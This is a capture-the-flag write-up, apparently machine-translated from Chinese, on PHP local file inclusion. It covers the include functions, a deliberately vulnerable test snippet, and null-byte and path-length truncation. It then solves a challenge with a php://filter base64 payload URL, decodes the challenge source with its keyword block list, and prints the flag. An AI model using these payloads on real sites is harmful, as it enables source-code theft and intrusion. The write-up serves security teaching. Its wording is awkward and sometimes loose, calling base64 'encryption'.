<>1.1 Formation of File Inclusion Vulnerability


File inclusion is a typical example of code injection ,PHP Contains code that can execute the containing file directly , And the format of the included file is unlimited , So if we enter malicious code in the include file , This will result in a file containing vulnerability , Most of the file containing vulnerabilities can be obtained directly webshell.

The file contains the following four functions :

* include() <http://www.w3school.com.cn/php/php_includes.asp>
* include_once <http://php.net/manual/zh/function.include-once.php>
* require()
* require_once()

The difference between them is that :include() and include_once() Even if errors are encountered when including files , The following code will continue to execute as well , and require() and require_once() Will directly report an error and exit the program .

<>1.2 Local file contains vulnerability

Local file contains (load file include) abbreviation LFI
The test code is as follows :
<?php define("ROOT",dirname(_FILE_).'/'); $file=$_GET['file']; echo
ROOT.$file.'.php'; include(ROOT.$file.'.php'); ?>
If you enter file=1, And in the 1.php Input in <?php phpinfo();?>, The page will display php Version information for .

<>1.3 File contains truncation

File included , If we can't write .php Files with extension , Truncation is often required

* Method 1 :
because php be based on c language , So 0 At the end of a character , So it can be used \0 perhaps %00 Truncate

* Method 2 :

Because sometimes %00 The truncation will be GPC and addslashes And so on , This is the first way we can do it , And in the directory string , stay windows256 byte ,linux lower 4096 The maximum value is reached when bytes , Characters after the maximum will be discarded , In this case, you can use more than one (.) and (/) To cut it off

<>1.4 Go straight to the topic

Title Link <http://4.chinalover.sinaapp.com/web7/index.php>



Click to jump to another interface


here
http://4.chinalover.sinaapp.com/web7/index.php?file=show.php
I tried to write a paragraph payload:
http://4.chinalover.sinaapp.com/web7/index.php?file=test123.php
and
http://4.chinalover.sinaapp.com/web7/index.php?file=index.php
It doesn't work at all , wow , Sure enough, this question is not so simple , There is no valid information about the source code , It's hard , There's no way to find out ,payload as follows :

http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
convert.base64-encode <http://php.net/manual/zh/filters.convert.php> Encrypt data stream
I don't understand it at all , No contact filter, I don't know what it is , So I searched it :



It turns out that this question has been tested php://filter Bypass of , Filter first index.php This data stream , And then through the base64 Encrypted read file code , So the page shows a passage base64 Encrypted string , As shown in the figure below :



PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4=
Take it through base64 After decoding , The web page source code appears :
<html> <title>asdf</title> <?php error_reporting(0); if(!$_GET[file]){echo '<a
href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file'];
if(strstr($file,"../")||stristr($file,
"tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); }
include($file); //flag:nctf{edulcni_elif_lacol_si_siht} ?> </html>
flag:nctf{edulcni_elif_lacol_si_siht}